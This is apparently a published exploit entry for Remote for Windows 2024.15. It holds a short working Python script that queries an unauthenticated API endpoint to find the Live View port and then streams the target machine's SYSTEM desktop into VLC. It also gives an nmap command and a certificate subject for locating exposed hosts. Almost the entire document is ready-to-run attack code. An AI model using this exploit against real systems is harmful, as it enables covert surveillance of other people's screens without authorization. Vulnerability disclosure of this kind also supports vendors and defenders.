📄 Remote for Windows 2024.15 Desktop Stream Disclosure

# Exploit Title: Remote for Windows 2024.15 - Unauthenticated SYSTEM
    Desktop Stream Exploit
    # Date: 2025-05-19
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://rs.ltd
    # Software Link: https://rs.ltd/latest.php?os=win
    # Version: 2024.15
    # Tested on: Windows 10/11 with Remote for Windows (helper)
    #!/usr/bin/env python3
    
    '''
    Remote for Windows 2024.15 - Unauthenticated SYSTEM Desktop Stream Exploit
    Vulnerable Component: Helper app Live View feature (raw H264 over TCP)
    Live View H264 per default is enabled.
    
    # Identification:
    nmap -p- -T4 <TARGET_IP> --script ssl-cert
    Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
    '''
    
    import requests, subprocess, urllib3, sys
    urllib3.disable_warnings()
    
    def p(s):
        try:
            i,p=s.split(':'); return i, int(p)
        except:
            print("Usage: python live.py <IP:PORT>"); sys.exit(1)
    
    def port(i,pt):
        try:
            r=requests.get(f"https://{i}:{pt}/api/getVersion",
    headers={"X-LiveView":"fixed"}, verify=0, timeout=5)
            return r.json().get('liveview.port')
        except:
            return None
    
    def vlc(i,p):
        subprocess.Popen(['vlc', f'tcp://{i}:{p}', '--demux=h264',
    '--no-video-title-show', '--quiet'])
    
    if __name__ == "__main__":
        if len(sys.argv)!=2: print("Usage: python live.py <IP:PORT>");
    sys.exit()
        i,pt = p(sys.argv[1])
        if (lp:=port(i,pt)): vlc(i,lp)
        else: print("Error: No LiveView port")